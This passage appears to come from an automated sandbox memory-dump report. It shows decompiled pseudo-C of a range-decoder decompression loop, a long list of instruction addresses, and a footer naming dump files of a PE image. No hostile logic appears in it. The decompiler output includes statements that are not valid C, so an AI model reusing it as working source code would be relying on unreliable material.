                                                                                                                          											}
                                                                                                                          										case 0x10:
                                                                                                                          											L109:
                                                                                                                          											__eflags =  *(__ebp - 0x6c);
                                                                                                                          											if( *(__ebp - 0x6c) == 0) {
                                                                                                                          												L165:
                                                                                                                          												 *(__ebp - 0x88) = 0x10;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L110:
                                                                                                                          											__ecx =  *(__ebp - 0x70);
                                                                                                                          											__eax =  *(__ebp - 0xc);
                                                                                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											_t365 = __ebp - 0x70;
                                                                                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          											__eflags =  *_t365;
                                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          											goto L111;
                                                                                                                          										case 0x11:
                                                                                                                          											L69:
                                                                                                                          											__esi =  *(__ebp - 0x58);
                                                                                                                          											 *(__ebp - 0x84) = 0x12;
                                                                                                                          											goto L132;
                                                                                                                          										case 0x12:
                                                                                                                          											L128:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												L131:
                                                                                                                          												__eax =  *(__ebp - 0x58);
                                                                                                                          												 *(__ebp - 0x84) = 0x13;
                                                                                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          												L132:
                                                                                                                          												 *(_t644 - 0x54) = _t642;
                                                                                                                          												goto L133;
                                                                                                                          											}
                                                                                                                          											L129:
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											__eflags = __eax;
                                                                                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          											goto L130;
                                                                                                                          										case 0x13:
                                                                                                                          											L141:
                                                                                                                          											__eflags =  *(__ebp - 0x40);
                                                                                                                          											if( *(__ebp - 0x40) != 0) {
                                                                                                                          												L143:
                                                                                                                          												_t469 = __ebp - 0x58;
                                                                                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          												__eflags =  *_t469;
                                                                                                                          												 *(__ebp - 0x30) = 0x10;
                                                                                                                          												 *(__ebp - 0x40) = 8;
                                                                                                                          												L144:
                                                                                                                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                                                                          												L145:
                                                                                                                          												 *(_t644 - 0x50) = 1;
                                                                                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                          												goto L149;
                                                                                                                          											}
                                                                                                                          											L142:
                                                                                                                          											__eax =  *(__ebp - 0x4c);
                                                                                                                          											__ecx =  *(__ebp - 0x58);
                                                                                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          											 *(__ebp - 0x30) = 8;
                                                                                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          											L130:
                                                                                                                          											 *(__ebp - 0x58) = __eax;
                                                                                                                          											 *(__ebp - 0x40) = 3;
                                                                                                                          											goto L144;
                                                                                                                          										case 0x14:
                                                                                                                          											L156:
                                                                                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          											__eax =  *(__ebp - 0x80);
                                                                                                                          											while(1) {
                                                                                                                          												L140:
                                                                                                                          												 *(_t644 - 0x88) = _t537;
                                                                                                                          												goto L1;
                                                                                                                          											}
                                                                                                                          										case 0x15:
                                                                                                                          											L91:
                                                                                                                          											__eax = 0;
                                                                                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          											__al = __al & 0x000000fd;
                                                                                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          											goto L120;
                                                                                                                          										case 0x16:
                                                                                                                          											goto L0;
                                                                                                                          										case 0x17:
                                                                                                                          											while(1) {
                                                                                                                          												L145:
                                                                                                                          												 *(_t644 - 0x50) = 1;
                                                                                                                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                          												goto L149;
                                                                                                                          											}
                                                                                                                          										case 0x18:
                                                                                                                          											goto L146;
                                                                                                                          										case 0x19:
                                                                                                                          											L94:
                                                                                                                          											__eflags = __ebx - 4;
                                                                                                                          											if(__ebx < 4) {
                                                                                                                          												L98:
                                                                                                                          												 *(__ebp - 0x2c) = __ebx;
                                                                                                                          												L119:
                                                                                                                          												_t393 = __ebp - 0x2c;
                                                                                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          												__eflags =  *_t393;
                                                                                                                          												L120:
                                                                                                                          												__eax =  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax;
                                                                                                                          												if(__eax == 0) {
                                                                                                                          													L166:
                                                                                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												L121:
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												L122:
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          												__eax =  *(__ebp - 0x30);
                                                                                                                          												_t400 = __ebp - 0x60;
                                                                                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          												__eflags =  *_t400;
                                                                                                                          												goto L123;
                                                                                                                          											}
                                                                                                                          											L95:
                                                                                                                          											__ecx = __ebx;
                                                                                                                          											__eax = __ebx;
                                                                                                                          											__ecx = __ebx >> 1;
                                                                                                                          											__eax = __ebx & 0x00000001;
                                                                                                                          											__ecx = (__ebx >> 1) - 1;
                                                                                                                          											__al = __al | 0x00000002;
                                                                                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          											__eflags = __ebx - 0xe;
                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                          											if(__ebx >= 0xe) {
                                                                                                                          												L97:
                                                                                                                          												__ebx = 0;
                                                                                                                          												 *(__ebp - 0x48) = __ecx;
                                                                                                                          												L102:
                                                                                                                          												__eflags =  *(__ebp - 0x48);
                                                                                                                          												if( *(__ebp - 0x48) <= 0) {
                                                                                                                          													L107:
                                                                                                                          													__eax = __eax + __ebx;
                                                                                                                          													 *(__ebp - 0x40) = 4;
                                                                                                                          													 *(__ebp - 0x2c) = __eax;
                                                                                                                          													__eax =  *(__ebp - 4);
                                                                                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          													__eflags = __eax;
                                                                                                                          													L108:
                                                                                                                          													__ebx = 0;
                                                                                                                          													 *(__ebp - 0x58) = __eax;
                                                                                                                          													 *(__ebp - 0x50) = 1;
                                                                                                                          													 *(__ebp - 0x44) = 0;
                                                                                                                          													 *(__ebp - 0x48) = 0;
                                                                                                                          													L112:
                                                                                                                          													__eax =  *(__ebp - 0x40);
                                                                                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          														L118:
                                                                                                                          														_t391 = __ebp - 0x2c;
                                                                                                                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          														__eflags =  *_t391;
                                                                                                                          														goto L119;
                                                                                                                          													}
                                                                                                                          													L113:
                                                                                                                          													__eax =  *(__ebp - 0x50);
                                                                                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          													__eax =  *(__ebp - 0x58);
                                                                                                                          													__esi = __edi + __eax;
                                                                                                                          													 *(__ebp - 0x54) = __esi;
                                                                                                                          													__ax =  *__esi;
                                                                                                                          													__ecx = __ax & 0x0000ffff;
                                                                                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          														__ecx = 0;
                                                                                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          														__ecx = 1;
                                                                                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          														__ebx = 1;
                                                                                                                          														__ecx =  *(__ebp - 0x48);
                                                                                                                          														__ebx = 1 << __cl;
                                                                                                                          														__ecx = 1 << __cl;
                                                                                                                          														__ebx =  *(__ebp - 0x44);
                                                                                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          														__cx = __ax;
                                                                                                                          														__cx = __ax >> 5;
                                                                                                                          														__eax = __eax - __ecx;
                                                                                                                          														__edi = __edi + 1;
                                                                                                                          														__eflags = __edi;
                                                                                                                          														 *(__ebp - 0x44) = __ebx;
                                                                                                                          														 *__esi = __ax;
                                                                                                                          														 *(__ebp - 0x50) = __edi;
                                                                                                                          													} else {
                                                                                                                          														 *(__ebp - 0x10) = __edx;
                                                                                                                          														0x800 = 0x800 - __ecx;
                                                                                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          														 *__esi = __dx;
                                                                                                                          													}
                                                                                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          														L111:
                                                                                                                          														_t368 = __ebp - 0x48;
                                                                                                                          														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                          														__eflags =  *_t368;
                                                                                                                          														goto L112;
                                                                                                                          													} else {
                                                                                                                          														L117:
                                                                                                                          														goto L109;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												L103:
                                                                                                                          												__ecx =  *(__ebp - 0xc);
                                                                                                                          												__ebx = __ebx + __ebx;
                                                                                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          												 *(__ebp - 0x44) = __ebx;
                                                                                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          													__ecx =  *(__ebp - 0x10);
                                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          													__ebx = __ebx | 0x00000001;
                                                                                                                          													__eflags = __ebx;
                                                                                                                          													 *(__ebp - 0x44) = __ebx;
                                                                                                                          												}
                                                                                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          													L101:
                                                                                                                          													_t338 = __ebp - 0x48;
                                                                                                                          													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                          													__eflags =  *_t338;
                                                                                                                          													goto L102;
                                                                                                                          												} else {
                                                                                                                          													L106:
                                                                                                                          													goto L99;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L96:
                                                                                                                          											__edx =  *(__ebp - 4);
                                                                                                                          											__eax = __eax - __ebx;
                                                                                                                          											 *(__ebp - 0x40) = __ecx;
                                                                                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                          											goto L108;
                                                                                                                          										case 0x1a:
                                                                                                                          											L56:
                                                                                                                          											__eflags =  *(__ebp - 0x64);
                                                                                                                          											if( *(__ebp - 0x64) == 0) {
                                                                                                                          												L162:
                                                                                                                          												 *(__ebp - 0x88) = 0x1a;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L57:
                                                                                                                          											__ecx =  *(__ebp - 0x68);
                                                                                                                          											__al =  *(__ebp - 0x5c);
                                                                                                                          											__edx =  *(__ebp - 8);
                                                                                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          											 *( *(__ebp - 0x68)) = __al;
                                                                                                                          											__ecx =  *(__ebp - 0x14);
                                                                                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                          											__eax = __ecx + 1;
                                                                                                                          											__edx = 0;
                                                                                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          											__edx = _t192;
                                                                                                                          											goto L80;
                                                                                                                          										case 0x1b:
                                                                                                                          											L76:
                                                                                                                          											__eflags =  *(__ebp - 0x64);
                                                                                                                          											if( *(__ebp - 0x64) == 0) {
                                                                                                                          												L163:
                                                                                                                          												 *(__ebp - 0x88) = 0x1b;
                                                                                                                          												goto L170;
                                                                                                                          											}
                                                                                                                          											L77:
                                                                                                                          											__eax =  *(__ebp - 0x14);
                                                                                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          												__eflags = __eax;
                                                                                                                          											}
                                                                                                                          											__edx =  *(__ebp - 8);
                                                                                                                          											__cl =  *(__eax + __edx);
                                                                                                                          											__eax =  *(__ebp - 0x14);
                                                                                                                          											 *(__ebp - 0x5c) = __cl;
                                                                                                                          											 *(__eax + __edx) = __cl;
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__edx = 0;
                                                                                                                          											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          											__edx = _t275;
                                                                                                                          											__eax =  *(__ebp - 0x68);
                                                                                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          											_t284 = __ebp - 0x64;
                                                                                                                          											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                          											__eflags =  *_t284;
                                                                                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          											L80:
                                                                                                                          											 *(__ebp - 0x14) = __edx;
                                                                                                                          											goto L81;
                                                                                                                          										case 0x1c:
                                                                                                                          											while(1) {
                                                                                                                          												L123:
                                                                                                                          												__eflags =  *(__ebp - 0x64);
                                                                                                                          												if( *(__ebp - 0x64) == 0) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L124:
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          													__eflags = __eax;
                                                                                                                          												}
                                                                                                                          												__edx =  *(__ebp - 8);
                                                                                                                          												__cl =  *(__eax + __edx);
                                                                                                                          												__eax =  *(__ebp - 0x14);
                                                                                                                          												 *(__ebp - 0x5c) = __cl;
                                                                                                                          												 *(__eax + __edx) = __cl;
                                                                                                                          												__eax = __eax + 1;
                                                                                                                          												__edx = 0;
                                                                                                                          												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          												__edx = _t414;
                                                                                                                          												__eax =  *(__ebp - 0x68);
                                                                                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                          												__eflags =  *(__ebp - 0x30);
                                                                                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          												 *(__ebp - 0x14) = _t414;
                                                                                                                          												if( *(__ebp - 0x30) > 0) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          													L127:
                                                                                                                          													L81:
                                                                                                                          													 *(__ebp - 0x88) = 2;
                                                                                                                          													goto L1;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L167:
                                                                                                                          											 *(__ebp - 0x88) = 0x1c;
                                                                                                                          											goto L170;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								L171:
                                                                                                                          								_t539 = _t538 | 0xffffffff;
                                                                                                                          								goto L172;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}















                                                                                                                          0x00405f57
                                                                                                                          0x00405f5b
                                                                                                                          0x004067a6
                                                                                                                          0x004067a6
                                                                                                                          0x00000000
                                                                                                                          0x004067a6
                                                                                                                          0x00405f61
                                                                                                                          0x00405f67
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f75
                                                                                                                          0x00405f78
                                                                                                                          0x00405f7b
                                                                                                                          0x00405f80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406617
                                                                                                                          0x00406617
                                                                                                                          0x0040661d
                                                                                                                          0x00406623
                                                                                                                          0x00406629
                                                                                                                          0x00406643
                                                                                                                          0x00406646
                                                                                                                          0x0040664c
                                                                                                                          0x00406657
                                                                                                                          0x00406657
                                                                                                                          0x00406659
                                                                                                                          0x0040662b
                                                                                                                          0x0040662b
                                                                                                                          0x0040663a
                                                                                                                          0x0040663e
                                                                                                                          0x0040663e
                                                                                                                          0x00406663
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406665
                                                                                                                          0x00406669
                                                                                                                          0x00406818
                                                                                                                          0x00406818
                                                                                                                          0x00000000
                                                                                                                          0x00406818
                                                                                                                          0x0040666f
                                                                                                                          0x00406675
                                                                                                                          0x0040667c
                                                                                                                          0x00406684
                                                                                                                          0x00406687
                                                                                                                          0x0040668a
                                                                                                                          0x0040668a
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fa8
                                                                                                                          0x00405fa8
                                                                                                                          0x00405faa
                                                                                                                          0x00405fad
                                                                                                                          0x0040601e
                                                                                                                          0x0040601e
                                                                                                                          0x00406021
                                                                                                                          0x00406024
                                                                                                                          0x0040602b
                                                                                                                          0x00406035
                                                                                                                          0x00000000
                                                                                                                          0x00406035
                                                                                                                          0x00405faf
                                                                                                                          0x00405faf
                                                                                                                          0x00405fb3
                                                                                                                          0x00405fb6
                                                                                                                          0x00405fb8
                                                                                                                          0x00405fbb
                                                                                                                          0x00405fbe
                                                                                                                          0x00405fc0
                                                                                                                          0x00405fc3
                                                                                                                          0x00405fc5
                                                                                                                          0x00405fca
                                                                                                                          0x00405fcd
                                                                                                                          0x00405fd0
                                                                                                                          0x00405fd4
                                                                                                                          0x00405fdb
                                                                                                                          0x00405fde
                                                                                                                          0x00405fe5
                                                                                                                          0x00405fe9
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405ff5
                                                                                                                          0x00405ff8
                                                                                                                          0x00406016
                                                                                                                          0x00406016
                                                                                                                          0x00406018
                                                                                                                          0x00000000
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffd
                                                                                                                          0x00406000
                                                                                                                          0x00406003
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406008
                                                                                                                          0x0040600b
                                                                                                                          0x0040600d
                                                                                                                          0x0040600e
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406247
                                                                                                                          0x00406247
                                                                                                                          0x0040624b
                                                                                                                          0x00406269
                                                                                                                          0x00406269
                                                                                                                          0x0040626c
                                                                                                                          0x00406273
                                                                                                                          0x00406276
                                                                                                                          0x00406279
                                                                                                                          0x0040627c
                                                                                                                          0x0040627f
                                                                                                                          0x00406282
                                                                                                                          0x00406284
                                                                                                                          0x0040628b
                                                                                                                          0x0040628c
                                                                                                                          0x0040628e
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x00406297
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x0040629c
                                                                                                                          0x0040624d
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406253
                                                                                                                          0x0040625d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062b1
                                                                                                                          0x004062b1
                                                                                                                          0x004062b5
                                                                                                                          0x004062d8
                                                                                                                          0x004062db
                                                                                                                          0x004062de
                                                                                                                          0x004062e8
                                                                                                                          0x004062b7
                                                                                                                          0x004062b7
                                                                                                                          0x004062ba
                                                                                                                          0x004062bd
                                                                                                                          0x004062c0
                                                                                                                          0x004062cd
                                                                                                                          0x004062d0
                                                                                                                          0x004062d0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062f4
                                                                                                                          0x004062f4
                                                                                                                          0x004062f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062fe
                                                                                                                          0x004062fe
                                                                                                                          0x00406302
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406308
                                                                                                                          0x00406308
                                                                                                                          0x0040630a
                                                                                                                          0x0040630e
                                                                                                                          0x0040630e
                                                                                                                          0x00406311
                                                                                                                          0x00406315
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406365
                                                                                                                          0x00406365
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406370
                                                                                                                          0x00406373
                                                                                                                          0x00406376
                                                                                                                          0x00406380
                                                                                                                          0x00000000
                                                                                                                          0x00406380
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040638c
                                                                                                                          0x0040638c
                                                                                                                          0x00406390
                                                                                                                          0x00406397
                                                                                                                          0x0040639a
                                                                                                                          0x0040639d
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x004065ee
                                                                                                                          0x004065ee
                                                                                                                          0x004065f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040669b
                                                                                                                          0x0040669b
                                                                                                                          0x0040669f
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066c4
                                                                                                                          0x004066cb
                                                                                                                          0x004066d2
                                                                                                                          0x004066d2
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x004066e6
                                                                                                                          0x004066a1
                                                                                                                          0x004066a1
                                                                                                                          0x004066a4
                                                                                                                          0x004066a7
                                                                                                                          0x004066aa
                                                                                                                          0x004066b1
                                                                                                                          0x004065f5
                                                                                                                          0x004065f5
                                                                                                                          0x004065f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040678c
                                                                                                                          0x0040678c
                                                                                                                          0x0040678f
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00406690
                                                                                                                          0x00000000
                                                                                                                          0x00406696
                                                                                                                          0x00000000
                                                                                                                          0x004063c6
                                                                                                                          0x004063c6
                                                                                                                          0x004063c8
                                                                                                                          0x004063cf
                                                                                                                          0x004063d0
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x004066e6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a4
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f
                                                                                                                          0x00406542
                                                                                                                          0x00406544
                                                                                                                          0x00406547
                                                                                                                          0x00406549
                                                                                                                          0x0040654b
                                                                                                                          0x0040654e
                                                                                                                          0x00406550
                                                                                                                          0x00406553
                                                                                                                          0x00406557
                                                                                                                          0x00406559
                                                                                                                          0x00406559
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406522
                                                                                                                          0x00406522
                                                                                                                          0x0040652a
                                                                                                                          0x0040652f
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406534
                                                                                                                          0x00406563
                                                                                                                          0x0040656a
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x004064f4
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656c
                                                                                                                          0x00000000
                                                                                                                          0x0040656c
                                                                                                                          0x0040656a
                                                                                                                          0x0040647d
                                                                                                                          0x0040647d
                                                                                                                          0x00406480
                                                                                                                          0x00406482
                                                                                                                          0x00406485
                                                                                                                          0x00406488
                                                                                                                          0x0040648b
                                                                                                                          0x0040648d
                                                                                                                          0x00406490
                                                                                                                          0x00406493
                                                                                                                          0x00406493
                                                                                                                          0x00406496
                                                                                                                          0x00406496
                                                                                                                          0x00406499
                                                                                                                          0x004064a0
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00406474
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a2
                                                                                                                          0x00000000
                                                                                                                          0x004064a2
                                                                                                                          0x004064a0
                                                                                                                          0x00406426
                                                                                                                          0x00406426
                                                                                                                          0x00406429
                                                                                                                          0x0040642b

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
